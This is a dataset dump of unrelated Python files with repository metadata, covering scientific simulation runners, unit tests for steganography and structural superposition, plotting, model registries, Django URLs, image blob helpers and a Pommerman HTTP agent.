7dd4c10b342878f52f717eef146ce0ddd5328f2c | 1,988 | py | Python | run/run_fd_tgv_conv.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | run/run_fd_tgv_conv.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | run/run_fd_tgv_conv.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | """ running converferce for finite differences and Taylor-Green vortex """
import os
from math import pi
import xml.etree.ElementTree as ET
import platform_paths as pp
import manipulator as ma
# load parameter file
ma.set_ids('../XML/parameterTGVTime.xml')
TREE = ET.parse('../XML/parameterTGVTime.xml')
ROOT = TREE.getroot()
ma.set_parameter(ROOT, 'withoutput', 1)
ma.set_parameter(ROOT, 'initial guess', 'zero')
# ma.set_parameter( ROOT, 'refinement level', 1 )
# make executable ready
EXE = 'peri_navier3DTime'
os.chdir(pp.EXE_PATH)
os.system('make '+EXE+' -j4')
CASE_PATH = ['']*4
RUNS = range(1)
RES = [10]
STS = [0.1, 10., 1.]
NFS = [72]
ma.set_parameter(ROOT, 'nx', 65)
ma.set_parameter(ROOT, 'ny', 65)
ma.set_parameter(ROOT, 'nz', 5)
CASE_PATH[0] = pp.DATA_PATH + '/FDTGV_conv2'
pp.mkdir(CASE_PATH, 0)
for re in RES:
CASE_PATH[1] = '/re_'+str(re)
pp.mkdir(CASE_PATH, 1)
for st in STS:
CASE_PATH[2] = '/a2_'+str(st)
pp.mkdir(CASE_PATH, 2)
for nf in NFS:
CASE_PATH[3] = '/nt_'+str(nf)
pp.mkdir(CASE_PATH, 3)
#
pp.chdir(CASE_PATH, 3)
#
ma.set_parameter(ROOT, 'Re', re)
ma.set_parameter(ROOT, 'alpha2', 2.*pi*st*re)
ma.set_parameter(ROOT, 'nf', nf)
ma.set_parameter(ROOT, 'npx', 1)
ma.set_parameter(ROOT, 'npy', 1)
ma.set_parameter(ROOT, 'npz', 1)
ma.set_parameter(ROOT, 'npf', 12)
TREE.write('parameter3D.xml')
# nptot = npx[i]*npy[i]*npf[i]
nptot = 12
mem = int(max(1024, 60*1024/nptot))
for run in RUNS:
print()
print(CASE_PATH)
exeString = \
pp.exe_pre(nptot, ' -N -R "rusage[mem=' +
str(mem) + ']" -W 6:00', run) + \
pp.EXE_PATH+'/'+EXE
print(exeString)
os.system(exeString)
| 27.611111 | 74 | 0.551308 | 277 | 1,988 | 3.830325 | 0.375451 | 0.065975 | 0.171536 | 0.220547 | 0.147031 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038654 | 0.297284 | 1,988 | 71 | 75 | 28 | 0.72083 | 0.094064 | 0 | 0 | 0 | 0 | 0.114589 | 0.030184 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.096154 | 0 | 0.096154 | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7de18177bc8f9c705a1427b2d13f1d6f74890139 | 1,308 | py | Python | test/test_message.py | Smac01/Stego | 0bcf94642871e611b6731676591a571ff40ce4a0 | [
"MIT"
] | null | null | null | test/test_message.py | Smac01/Stego | 0bcf94642871e611b6731676591a571ff40ce4a0 | [
"MIT"
] | null | null | null | test/test_message.py | Smac01/Stego | 0bcf94642871e611b6731676591a571ff40ce4a0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import unittest
import sys
sys.path.insert(0, '.')
from random import choice
from PIL import Image
from stego.encoder import embed
from stego.decoder import extract, _decompress, IncorrectPassword
from stego.base import make_array, as_string, extract_metadata
images = ['test/rgba.png', 'test/cmyk.tiff', 'test/greyscale.bmp']
image = choice(images)
message = b'Pixels -> smallest unit(small colored square) that constitutes an images.'
key = b'my_secret_key'
def test_embed(message, password):
imageobj = Image.open(image)
embed(imageobj, message, password)
def test_extract(password):
imageobj = Image.open(image)
img_data = make_array(imageobj.getdata())
exif = extract_metadata(img_data)
content = as_string(img_data[slice(24, exif.size)])
if password:
content = _decompress(content, key=password)
else:
content = _decompress(content)
return content
class SampleTestMessage(unittest.TestCase):
def test_message(self):
test_embed(message, None)
content = test_extract(None)
self.assertEqual(message, content)
def test_message_with_encryption(self):
test_embed(message,key)
content = test_extract(key)
self.assertEqual(message, content)
self.assertRaises(IncorrectPassword,test_extract, b'random')
if __name__ == '__main__':
unittest.main() | 25.647059 | 86 | 0.769113 | 176 | 1,308 | 5.528409 | 0.431818 | 0.028777 | 0.049332 | 0.051387 | 0.061665 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003481 | 0.12156 | 1,308 | 51 | 87 | 25.647059 | 0.843342 | 0.016055 | 0 | 0.108108 | 0 | 0 | 0.113442 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 1 | 0.108108 | false | 0.189189 | 0.189189 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7de837001eba6d36074503fa3a70a1bcb083d08b | 795 | py | Python | opencadd/tests/structure/test_superposition_mda.py | pipaj97/opencadd | 4fcf090bd612a22df9d617473ae458316a4cb4b6 | [
"MIT"
] | 39 | 2020-08-14T07:33:21.000Z | 2022-03-30T02:05:19.000Z | opencadd/tests/structure/test_superposition_mda.py | Allend95/opencadd | 1fde238e3cf8e5e47e8266a504d9df0196505e97 | [
"MIT"
] | 94 | 2020-06-29T12:47:46.000Z | 2022-02-13T19:16:25.000Z | opencadd/tests/structure/test_superposition_mda.py | Allend95/opencadd | 1fde238e3cf8e5e47e8266a504d9df0196505e97 | [
"MIT"
] | 11 | 2020-11-11T17:12:38.000Z | 2022-03-21T09:23:39.000Z | """
Tests for opencadd.structure.superposition.engines.mda
"""
import pytest
from opencadd.structure.core import Structure
from opencadd.structure.superposition.engines.mda import MDAnalysisAligner
def test_mda_instantiation():
aligner = MDAnalysisAligner()
def test_mda_calculation():
aligner = MDAnalysisAligner()
structures = [Structure.from_pdbid(pdb_id) for pdb_id in ["4u3y", "4u40"]]
result = aligner.calculate(structures)
# Check API compliance
assert "superposed" in result
assert "scores" in result
assert "rmsd" in result["scores"]
assert "metadata" in result
# Check RMSD values
# TODO: pytest.approx is not working reliably - check with Dennis too, he has the same problem
assert pytest.approx(result["scores"]["rmsd"], 1.989)
| 28.392857 | 98 | 0.733333 | 98 | 795 | 5.877551 | 0.520408 | 0.055556 | 0.104167 | 0.128472 | 0.159722 | 0.159722 | 0 | 0 | 0 | 0 | 0 | 0.013636 | 0.169811 | 795 | 27 | 99 | 29.444444 | 0.859091 | 0.23522 | 0 | 0.142857 | 0 | 0 | 0.086957 | 0 | 0 | 0 | 0 | 0.037037 | 0.357143 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dee5b01ddca7ca6f3f444bdaf770ca84c443c68 | 572 | py | Python | tests/integration/test_serialise.py | csiro-easi/eo-datasets | 7805c569763f828cb0ace84c93932bddb882a6a3 | [
"Apache-2.0"
] | null | null | null | tests/integration/test_serialise.py | csiro-easi/eo-datasets | 7805c569763f828cb0ace84c93932bddb882a6a3 | [
"Apache-2.0"
] | null | null | null | tests/integration/test_serialise.py | csiro-easi/eo-datasets | 7805c569763f828cb0ace84c93932bddb882a6a3 | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from typing import Dict
from eodatasets3 import serialise
from .common import assert_same, dump_roundtrip
def test_valid_document_works(tmp_path: Path, example_metadata: Dict):
generated_doc = dump_roundtrip(example_metadata)
# Do a serialisation roundtrip and check that it's still identical.
reserialised_doc = dump_roundtrip(
serialise.to_doc(serialise.from_doc(generated_doc))
)
assert_same(generated_doc, reserialised_doc)
assert serialise.from_doc(generated_doc) == serialise.from_doc(reserialised_doc)
| 30.105263 | 84 | 0.791958 | 76 | 572 | 5.671053 | 0.460526 | 0.12065 | 0.111369 | 0.088167 | 0.12993 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002053 | 0.148601 | 572 | 18 | 85 | 31.777778 | 0.882957 | 0.113636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
7deee6c010d48a8d2b8631423560a24cab9c77a0 | 4,369 | py | Python | src/plot/plot-bb/plot_methods.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | null | null | null | src/plot/plot-bb/plot_methods.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | null | null | null | src/plot/plot-bb/plot_methods.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | 2 | 2020-11-08T12:51:23.000Z | 2021-12-02T23:16:48.000Z |
import numpy as np
import matplotlib.pyplot as plt
####################
def merge_dicts(list_of_dicts):
results = {}
for d in list_of_dicts:
for key in d.keys():
if key in results.keys():
results[key].append(d[key])
else:
results[key] = [d[key]]
return results
####################
comp_pJ = 22. * 1e-12 / 32. / 16.
num_layers = 6
num_comparator = 8
results = np.load('results.npy', allow_pickle=True).item()
y_mean = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_std = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_mac_per_cycle = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_mac_per_pJ = np.zeros(shape=(2, 2, 2, 2, num_layers))
cycle = np.zeros(shape=(2, 2, 2, 2, num_layers))
nmac = np.zeros(shape=(2, 2, 2, 2, num_layers))
array = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_ron = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_roff = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_adc = np.zeros(shape=(2, 2, 2, 2, num_layers, num_comparator))
y_energy = np.zeros(shape=(2, 2, 2, 2, num_layers))
array_util = np.zeros(shape=(2, 2, 2, 2, num_layers))
for key in sorted(results.keys()):
(skip, cards, alloc, profile) = key
alloc = 1 if alloc == 'block' else 0
layer_results = results[key]
max_cycle = 0
for layer in range(num_layers):
rdict = merge_dicts(layer_results[layer])
############################
y_mean[skip][cards][alloc][profile][layer] = np.mean(rdict['mean'])
y_std[skip][cards][alloc][profile][layer] = np.mean(rdict['std'])
############################
y_ron[skip][cards][alloc][profile][layer] = np.sum(rdict['ron'])
y_roff[skip][cards][alloc][profile][layer] = np.sum(rdict['roff'])
y_adc[skip][cards][alloc][profile][layer] = np.sum(rdict['adc'], axis=0)
y_energy[skip][cards][alloc][profile][layer] += y_ron[skip][cards][alloc][profile][layer] * 2e-16
y_energy[skip][cards][alloc][profile][layer] += y_roff[skip][cards][alloc][profile][layer] * 2e-16
y_energy[skip][cards][alloc][profile][layer] += np.sum(y_adc[skip][cards][alloc][profile][layer] * np.array([1,2,3,4,5,6,7,8]) * comp_pJ)
y_mac_per_cycle[skip][cards][alloc][profile][layer] = np.sum(rdict['nmac']) / np.sum(rdict['cycle'])
y_mac_per_pJ[skip][cards][alloc][profile][layer] = np.sum(rdict['nmac']) / 1e12 / np.sum(y_energy[skip][cards][alloc][profile][layer])
############################
cycle[skip][cards][alloc][profile][layer] = np.mean(rdict['cycle'])
nmac[skip][cards][alloc][profile][layer] = np.mean(rdict['nmac'])
array[skip][cards][alloc][profile][layer] = np.mean(rdict['array'])
############################
max_cycle = max(max_cycle, np.mean(rdict['cycle']))
############################
for layer in range(num_layers):
rdict = merge_dicts(layer_results[layer])
############################
y_cycle = np.mean(rdict['cycle'])
y_stall = np.mean(rdict['stall'])
y_array = np.mean(rdict['array'])
array_util[skip][cards][alloc][profile][layer] = (y_array * y_cycle - y_stall) / (y_array * max_cycle)
############################
####################
layers = np.array(range(1, 6+1))
skip_none = int(np.max(cycle[1, 0, 0, 0]))
skip_layer = int(np.max(cycle[1, 0, 0, 1]))
skip_block = int(np.max(cycle[1, 0, 1, 1]))
cards_none = int(np.max(cycle[1, 1, 0, 0]))
cards_layer = int(np.max(cycle[1, 1, 0, 1]))
cards_block = int(np.max(cycle[1, 1, 1, 1]))
height = [skip_none, skip_layer, skip_block, cards_none, cards_layer, cards_block]
x = ['skip/none', 'skip/layer', 'skip/block', 'cards/none', 'cards/layer', 'cards/block']
####################
plt.rcParams.update({'font.size': 12})
####################
plt.cla()
plt.clf()
plt.close()
plt.ylabel('# Cycles')
# plt.xlabel('Method')
plt.xticks(range(len(x)), x, rotation=45)
width = 0.2
plt.bar(x=x, height=height, width=width)
ax = plt.gca()
for i, h in enumerate(height):
# print (i, h)
ax.text(i - width, h + np.min(height)*0.02, str(h), fontdict={'size': 12})
fig = plt.gcf()
fig.set_size_inches(9, 5)
plt.tight_layout()
fig.savefig('cycles.png', dpi=300)
####################
| 29.721088 | 145 | 0.559396 | 656 | 4,369 | 3.591463 | 0.182927 | 0.03056 | 0.03056 | 0.169355 | 0.58871 | 0.570883 | 0.534805 | 0.480475 | 0.325976 | 0.260187 | 0 | 0.034746 | 0.189746 | 4,369 | 146 | 146 | 29.924658 | 0.630791 | 0.007553 | 0 | 0.051282 | 0 | 0 | 0.042893 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.025641 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8148c634d7eb81e51ee23984bd4ad754b8ff54d8 | 816 | py | Python | models/__init__.py | pgodet/star_flow | cedb96ff339d11abf71d12d09e794593a742ccce | [
"Apache-2.0"
] | 10 | 2020-11-17T12:55:00.000Z | 2022-01-13T07:23:55.000Z | models/__init__.py | pgodet/star_flow | cedb96ff339d11abf71d12d09e794593a742ccce | [
"Apache-2.0"
] | 1 | 2021-01-02T22:46:07.000Z | 2021-01-02T22:46:07.000Z | models/__init__.py | pgodet/star_flow | cedb96ff339d11abf71d12d09e794593a742ccce | [
"Apache-2.0"
] | 1 | 2021-01-26T10:53:02.000Z | 2021-01-26T10:53:02.000Z | from . import pwcnet
from . import pwcnet_irr
from . import pwcnet_occ_joint
from . import pwcnet_irr_occ_joint
from . import tr_flow
from . import tr_features
from . import IRR_PWC
from . import IRR_PWC_occ_joint
from . import STAR
PWCNet = pwcnet.PWCNet
PWCNet_irr = pwcnet_irr.PWCNet
PWCNet_occ_joint = pwcnet_occ_joint.PWCNet
PWCNet_irr_occ_joint = pwcnet_irr_occ_joint.PWCNet
TRFlow = tr_flow.TRFlow
TRFlow_occjoint = tr_flow.TRFlow_occjoint
TRFlow_irr = tr_flow.TRFlow_irr
TRFlow_irr_occjoint = tr_flow.TRFlow_irr_occjoint
TRFeat = tr_features.TRFeat
TRFeat_occjoint = tr_features.TRFeat_occjoint
TRFeat_irr_occjoint = tr_features.TRFeat_irr_occjoint
# -- With refinement ---
IRR_PWC = IRR_PWC.PWCNet
IRR_occ_joint = IRR_PWC_occ_joint.PWCNet
StarFlow = STAR.StarFlow
| 24 | 53 | 0.792892 | 123 | 816 | 4.837398 | 0.138211 | 0.151261 | 0.117647 | 0.114286 | 0.067227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154412 | 816 | 33 | 54 | 24.727273 | 0.862319 | 0.026961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.391304 | 0 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
815535942d00809101f7b9f361c4f256b557f56f | 1,321 | py | Python | examples/generated_sample_regression.py | micheleantonazzi/gibson-dataset | cb5fc81061bbda1a653d6fc7b625b14c8a517f3c | [
"MIT"
] | 3 | 2021-10-31T17:43:50.000Z | 2022-03-21T08:55:01.000Z | examples/generated_sample_regression.py | micheleantonazzi/gibson-dataset | cb5fc81061bbda1a653d6fc7b625b14c8a517f3c | [
"MIT"
] | null | null | null | examples/generated_sample_regression.py | micheleantonazzi/gibson-dataset | cb5fc81061bbda1a653d6fc7b625b14c8a517f3c | [
"MIT"
] | null | null | null | from generic_dataset.data_pipeline import DataPipeline
from generic_dataset.generic_sample import synchronize_on_fields
from generic_dataset.sample_generator import SampleGenerator
import numpy as np
import generic_dataset.utilities.save_load_methods as slm
pipeline_rgb_to_gbr = DataPipeline().add_operation(lambda data, engine: (data[:, :, [2, 1, 0]], engine))
@synchronize_on_fields(field_names={'field_3'}, check_pipeline=False)
def field_3_is_positive(sample) -> bool:
return sample.get_field_3() > 0
# To model a regression problem, label_set parameter must be empty
GeneratedSampleRegression = SampleGenerator(name='GeneratedSampleRegression', label_set=set()).add_dataset_field(field_name='rgb_image', field_type=np.ndarray, save_function=slm.save_compressed_numpy_array, load_function=slm.load_compressed_numpy_array) \
.add_dataset_field(field_name='bgr_image', field_type=np.ndarray, save_function=slm.save_cv2_image_bgr, load_function=slm.load_cv2_image_bgr) \
.add_field(field_name='field_3', field_type=int) \
.add_custom_pipeline(method_name='create_pipeline_convert_rgb_to_bgr', elaborated_field='rgb_image', final_field='bgr_image', pipeline=pipeline_rgb_to_gbr) \
.add_custom_method(method_name='field_3_is_positive', function=field_3_is_positive) \
.generate_sample_class() | 62.904762 | 255 | 0.824375 | 192 | 1,321 | 5.239583 | 0.369792 | 0.035785 | 0.053678 | 0.047714 | 0.131213 | 0.083499 | 0.083499 | 0.083499 | 0.083499 | 0 | 0 | 0.009868 | 0.079485 | 1,321 | 21 | 256 | 62.904762 | 0.817434 | 0.048448 | 0 | 0 | 0 | 0 | 0.101911 | 0.046975 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0.066667 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
816842032e46719c27ed0ea91d613473a3f094ca | 601 | py | Python | architecture_tool_django/graphdefs/urls.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
] | 1 | 2021-08-13T01:37:29.000Z | 2021-08-13T01:37:29.000Z | architecture_tool_django/graphdefs/urls.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
] | null | null | null | architecture_tool_django/graphdefs/urls.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
] | 1 | 2021-07-19T07:57:54.000Z | 2021-07-19T07:57:54.000Z | from django.urls import path
from . import views
app_name = "graphs"
urlpatterns = [
path("graphs/", views.GraphListView.as_view(), name="graph.list"),
path("graphs/create/", views.GraphCreateView.as_view(), name="graph.create"),
path(
"graphs/<str:pk>/",
views.GraphDetailView.as_view(),
name="graph.detail",
),
path(
"graphs/<str:pk>/update/",
views.GraphUpdateView.as_view(),
name="graph.update",
),
path(
"graphs/<str:pk>/delete/",
views.GraphDeleteView.as_view(),
name="graph.delete",
),
]
| 24.04 | 81 | 0.587354 | 66 | 601 | 5.257576 | 0.378788 | 0.144092 | 0.144092 | 0.216138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.236273 | 601 | 24 | 82 | 25.041667 | 0.755991 | 0 | 0 | 0.272727 | 0 | 0 | 0.244592 | 0.076539 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81690ba836e0e2d1c0fdfb89754bbbb996e53c02 | 2,823 | py | Python | lib/utils/blob.py | TheRevanchist/DeepWatershedDetection | 6d8f3b3ca6db67bcebef8e18fb11248e15bd9dc4 | [
"MIT"
] | null | null | null | lib/utils/blob.py | TheRevanchist/DeepWatershedDetection | 6d8f3b3ca6db67bcebef8e18fb11248e15bd9dc4 | [
"MIT"
] | null | null | null | lib/utils/blob.py | TheRevanchist/DeepWatershedDetection | 6d8f3b3ca6db67bcebef8e18fb11248e15bd9dc4 | [
"MIT"
] | null | null | null | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick - extended by Lukas Tuggener
# --------------------------------------------------------
"""Blob helper functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
import random
def im_list_to_blob(ims):
"""Convert a list of images into a network input.
Assumes images are already prepared (means subtracted, BGR order, ...).
"""
max_shape = np.array([im.shape for im in ims]).max(axis=0)
num_images = len(ims)
blob = np.zeros((num_images, max_shape[0], max_shape[1], 3),
dtype=np.float32)
for i in range(num_images):
im = ims[i]
blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
return blob
def prep_im_for_blob(im, pixel_means, global_scale, args):
"""Mean subtract and scale an image for use in a blob."""
im = im.astype(np.float32, copy=False)
# substract mean
if args.substract_mean == "True":
im -= pixel_means
# do global scaling
im = cv2.resize(im, None, None, fx=global_scale, fy=global_scale,
interpolation=cv2.INTER_LINEAR)
im_size_max = np.max(im.shape[0:2])
# Prevent the biggest axis from being more than MAX_SIZE
if im_size_max > args.max_edge:
if not args.crop == "True":
# scale down if bigger than max size
re_scale = (float(args.max_edge) / float(im_size_max))
im = cv2.resize(im, None, None, fx=re_scale, fy=re_scale,
interpolation=cv2.INTER_LINEAR)
global_scale = global_scale*re_scale
crop_box = [0,0,im.shape[0],im.shape[1]]
else:
# Crop image
topleft = random.uniform(0,1)<args.crop_top_left_bias
# crop to max size if necessary
if im.shape[0] <= args.max_edge or topleft:
crop_0 = 0
else:
crop_0 = random.randint(0,im.shape[0]-args.max_edge)
if im.shape[1] <= args.max_edge or topleft:
crop_1 = 0
else:
crop_1 = random.randint(0,im.shape[1]-args.max_edge)
crop_box = [crop_0, crop_1, min(crop_0+args.max_edge,im.shape[0]), min(crop_1+args.max_edge,im.shape[1])]
im = im[crop_box[0]:crop_box[2],crop_box[1]:crop_box[3]]
else:
crop_box = [0, 0, im.shape[0], im.shape[1]]
if not args.pad_to == 0:
# pad to fit RefineNet #TODO fix refinenet padding problem
y_mulity = int(np.ceil(im.shape[0] / float(args.pad_to)))
x_mulity = int(np.ceil(im.shape[1] / float(args.pad_to)))
canv = np.ones([y_mulity * args.pad_to, x_mulity * args.pad_to,3], dtype=np.uint8) * 255
canv[0:im.shape[0], 0:im.shape[1]] = im
im = canv
return im, global_scale, crop_box
| 32.825581 | 111 | 0.631598 | 456 | 2,823 | 3.725877 | 0.307018 | 0.074161 | 0.047087 | 0.026486 | 0.260742 | 0.16598 | 0.080047 | 0.052972 | 0.052972 | 0.029429 | 0 | 0.029897 | 0.206164 | 2,823 | 85 | 112 | 33.211765 | 0.728246 | 0.240879 | 0 | 0.16 | 0 | 0 | 0.003795 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.04 | false | 0 | 0.12 | 0 | 0.2 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81691bebff51090814a13a3ea3f9262d90d38a7b | 1,022 | py | Python | edlm/convert/_get_media_folders.py | etcher-be/EDLM | 7b25c85252fd15c2c222b00271f7a32e335db704 | [
"MIT"
] | null | null | null | edlm/convert/_get_media_folders.py | etcher-be/EDLM | 7b25c85252fd15c2c222b00271f7a32e335db704 | [
"MIT"
] | 4 | 2020-03-24T16:53:26.000Z | 2020-06-26T08:31:13.000Z | edlm/convert/_get_media_folders.py | etcher-be/EDLM | 7b25c85252fd15c2c222b00271f7a32e335db704 | [
"MIT"
] | null | null | null | # coding=utf-8
"""
Gathers the media folders
"""
import elib
from ._context import Context
def get_media_folders(ctx: Context):
"""
Gathers the media folders
"""
ctx.info('gathering media folders')
media_folders = []
this_folder = ctx.source_folder
while True:
ctx.debug(f'traversing: "{this_folder}"')
media_folder_candidate = elib.path.ensure_path(this_folder, 'media', must_exist=False).absolute()
if media_folder_candidate.exists() and media_folder_candidate.is_dir():
ctx.debug(f'media folder found: "{media_folder_candidate}"')
media_folders.append(media_folder_candidate)
if len(this_folder.parents) is 1:
ctx.debug(f'reach mount point at: "{this_folder}"')
break
this_folder = this_folder.parent
# if not media_folders:
# raise ConvertError('no media folder found', ctx)
ctx.info(f'media folders:\n{elib.pretty_format(media_folders)}')
ctx.media_folders = media_folders
| 28.388889 | 105 | 0.672211 | 132 | 1,022 | 4.969697 | 0.409091 | 0.20122 | 0.152439 | 0.067073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002503 | 0.2182 | 1,022 | 35 | 106 | 29.2 | 0.818523 | 0.136986 | 0 | 0 | 0 | 0 | 0.220537 | 0.082847 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.111111 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8174be4107d534513138717c81ca4815dbd17aaf | 2,760 | py | Python | pommerman/agents/http_agent.py | KaixiangLin/playground | a0eb299f4772bada1c528a881f3bf26404b131aa | [
"Apache-2.0"
] | 2 | 2018-11-10T08:31:13.000Z | 2018-11-13T08:16:45.000Z | pommerman/agents/http_agent.py | KaixiangLin/playground | a0eb299f4772bada1c528a881f3bf26404b131aa | [
"Apache-2.0"
] | null | null | null | pommerman/agents/http_agent.py | KaixiangLin/playground | a0eb299f4772bada1c528a881f3bf26404b131aa | [
"Apache-2.0"
] | null | null | null | '''The HTTP agent - provides observation using http push to remote
agent and expects action in the reply'''
import json
import time
import os
import threading
import requests
from . import BaseAgent
from .. import utility
from .. import characters
class HttpAgent(BaseAgent):
"""The HTTP Agent that connects to a port with a remote agent where the
character runs. It uses the same interface as the docker agent and
is useful for debugging."""
def __init__(self,
port=8080,
host='localhost',
timeout=120,
character=characters.Bomber):
self._port = port
self._host = host
self._timeout = timeout
super(HttpAgent, self).__init__(character)
self._wait_for_remote()
def _wait_for_remote(self):
"""Wait for network service to appear. A timeout of 0 waits forever."""
timeout = self._timeout
backoff = .25
max_backoff = min(timeout, 16)
if timeout:
# time module is needed to calc timeout shared between two exceptions
end = time.time() + timeout
while True:
try:
now = time.time()
if timeout and end < now:
print("Timed out - %s:%s" % (self._host, self._port))
raise
request_url = 'http://%s:%s/ping' % (self._host, self._port)
req = requests.get(request_url)
self._acknowledged = True
return True
except requests.exceptions.ConnectionError as e:
print("ConnectionError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except requests.exceptions.HTTPError as e:
print("HTTPError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://{}:{}/action".format(self._host, self._port)
try:
req = requests.post(
request_url,
timeout=0.15,
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
action = [0] * len(action_space.shape)
if len(action) == 1:
action = action[0]
return action
